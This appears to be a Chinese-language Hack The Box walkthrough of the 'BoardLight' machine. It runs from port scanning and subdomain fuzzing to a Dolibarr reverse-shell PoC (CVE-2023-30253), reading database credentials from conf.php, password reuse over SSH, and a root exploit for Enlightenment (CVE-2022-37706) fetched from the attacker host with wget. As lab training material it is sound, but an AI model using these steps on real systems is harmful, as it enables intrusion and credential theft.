'BoardLight-hackthebox'

靶机ip：10.10.11.11

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -v  -Pn 10.10.11.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 19:54 EDT
NSE: Loaded 46 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:54
Completed Parallel DNS resolution of 1 host. at 19:54, 13.00s elapsed
Initiating SYN Stealth Scan at 19:54
Scanning 10.10.11.11 [1000 ports]
Discovered open port 22/tcp on 10.10.11.11
Discovered open port 80/tcp on 10.10.11.11

子域名爆破

ffuf -u http://board.htb -w /root/yiyi/dic/subdomains-top1million-110000.txt -c -H "Host:FUZZ.Board.htb" -t 5 -fw 6243

┌──(root㉿kali)-[~/yiyi]
└─# ffuf -u http://board.htb -w /root/yiyi/dic/subdomains-top1million-5000.txt -c -H "Host:FUZZ.Board.htb" -t 5 -fw 6243

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /root/yiyi/dic/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.Board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 5
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6243
________________________________________________

autoconfig              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2235ms]
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6257ms]
sms                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3409ms]
games                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6982ms]
citrix                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6702ms]
connect                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6220ms]
game                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4258ms]
qa                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7269ms]
irc                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8358ms]
painel                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4582ms]
pgsql                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4589ms]
mailer                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6597ms]
marketing               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3282ms]
v2                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4559ms]
images4                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4983ms]
hermes                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8009ms]
internal                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5860ms]
www.ads                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5570ms]
ms                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3494ms]
w3                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4823ms]
board                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5723ms]
lync                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6090ms]
net                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6829ms]
mailing                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5028ms]
da                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5241ms]
katalog                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5251ms]
maintenance             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7306ms]
bt                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1887ms]
phone                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3973ms]
demo1                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3625ms]
abc                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5893ms]
web6                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6690ms]
multimedia              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2964ms]
fc                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4626ms]
ct                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3502ms]
cisco-capwap-controller [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5799ms]
rd                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4815ms]
all                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5190ms]
style                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3796ms]
maya                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6838ms]
www.app                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5799ms]
java                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5573ms]
bravo                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1070ms]
depot                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4462ms]
mysql4                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5264ms]
smtp-out                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6071ms]
eu.pool                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7153ms]
rds                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4133ms]
bookstore               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8217ms]
publish                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5300ms]
smtp5                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5885ms]
ks                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8033ms]
epay                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6208ms]
2010                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2914ms]
tj                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2579ms]
texas                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3224ms]
smtp-relay              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1481ms]
core2                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2178ms]
lisa                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5780ms]
p2                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4943ms]
mailin                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6036ms]
www-a                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5070ms]
ics                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2465ms]
cwa                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1070ms]
www01                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5382ms]
patch                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2798ms]
wb                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3391ms]
guides                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4807ms]
singapore               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4836ms]
hm                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5288ms]
bl                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5642ms]
trk                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5029ms]
mstun                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2625ms]
mail.test               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6962ms]
postoffice              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4829ms]
s21                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4151ms]
target                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2808ms]
vip2                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4294ms]
land                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4643ms]
cobalt                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3682ms]
ifolder                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2758ms]
www.gold                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4663ms]
www.p                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4030ms]
imagine                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5663ms]
s28                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5244ms]
bingo                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4152ms]
edocs                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5332ms]
vsp                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4392ms]
www.school              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4396ms]
s18                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5895ms]
kg                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1124ms]
arwen                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5366ms]
comics                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5882ms]
www.movil               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4255ms]
host7                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4286ms]
fileshare               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5800ms]
new1                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5390ms]
ski                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4331ms]
www.db                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6557ms]
www.pluslatex.users     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4473ms]
prof                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4828ms]
di                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9517ms]
pluslatex.users         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3895ms]
www.math                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7263ms]
www.bbs                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6966ms]
yoshi                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4224ms]
soleil                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3665ms]
prohome                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5107ms]
kenny                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5981ms]
autodiscover.en         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2675ms]
win10                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8583ms]
sunset                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2111ms]
mech                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5786ms]
universal               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3983ms]
unknown                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4688ms]
suzuki                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3956ms]
ipsec                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5269ms]
balder                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3137ms]
s50                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6508ms]
zip                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6889ms]
baseball                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5410ms]
reader                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1518ms]
mp1                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3387ms]
php5                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4507ms]
qb                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6722ms]
www.hr                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9579ms]
mts                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5877ms]
www.saratov             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5986ms]
kaliningrad             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2722ms]
blacklist               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6830ms]
nuke                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5141ms]
laguna                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4412ms]
cbf2                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4942ms]
:: Progress: [4989/4989] :: Job [1/1] :: 0 req/sec :: Duration: [2:21:35] :: Errors: 365 ::

根据框架找到对应的poc

POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)

PoC

Help of exploit:

➜  python3 exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit

Run the netcat on your host:

➜ nc -lvnp 9001

Run the exploit (example):

➜ python3 exploit.py http://example.com login passsword 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

直接打拿shell

在/var/www/html/crm.board.htb/htdocs/conf/conf.php文件中找到凭据

www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
<at /var/www/html/crm.board.htb/htdocs/conf/conf.php            
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';

//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';

//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';

密码喷洒

关键信息

$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

这个是数据库的配置文件，虽然里面的账密对应的是数据库用户的账密，但是这个密码本身可以尝试用来登录其他用户

发现用该密码可以登录larissa用户

根据地核师傅所说，这种手法叫做密码喷洒

┌──(root㉿kali)-[~/yiyi]
└─# ssh larissa@10.10.11.11
The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.
larissa@10.10.11.11's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
larissa@boardlight:~$ cat user.txt
10b08d5a465678932cdf7b37ea4ec088

提权

larissa@boardlight:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

enlightenment因为setuid的问题导致用户可以越权，网上有现成的poc

larissa@boardlight:~$ wget http://10.10.16.50:80/exploit.sh
--2024-08-13 08:31:45--  http://10.10.16.50/exploit.sh
Connecting to 10.10.16.50:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [text/x-sh]
Saving to: ‘exploit.sh’

exploit.sh                               100%[===============================================================================>]     709  --.-KB/s    in 0s      

2024-08-13 08:32:01 (131 MB/s) - ‘exploit.sh’ saved [709/709]

larissa@boardlight:~$ ls
Desktop  Documents  Downloads  exploit.sh  Music  Pictures  Public  Templates  user.txt  Videos
larissa@boardlight:~$ chmod 777 exploit.sh
larissa@boardlight:~$ ls -al
total 80
drwxr-x--- 15 larissa larissa 4096 Aug 13 08:32 .
drwxr-xr-x  3 root    root    4096 May 17 01:04 ..
lrwxrwxrwx  1 root    root       9 Sep 18  2023 .bash_history -> /dev/null
-rw-r--r--  1 larissa larissa  220 Sep 17  2023 .bash_logout
-rw-r--r--  1 larissa larissa 3771 Sep 17  2023 .bashrc
drwx------  2 larissa larissa 4096 Aug 13 08:22 .cache
drwx------ 12 larissa larissa 4096 May 17 01:04 .config
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Desktop
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Documents
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 Downloads
-rwxrwxrwx  1 larissa larissa  709 Sep 19  2022 exploit.sh
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 .local
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Music
lrwxrwxrwx  1 larissa larissa    9 Sep 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Pictures
-rw-r--r--  1 larissa larissa  807 Sep 17  2023 .profile
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Public
drwx------  2 larissa larissa 4096 May 17 01:04 .run
drwx------  2 larissa larissa 4096 May 17 01:04 .ssh
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Templates
-rw-r-----  1 root    larissa   33 Aug 12 23:23 user.txt
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Videos
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
#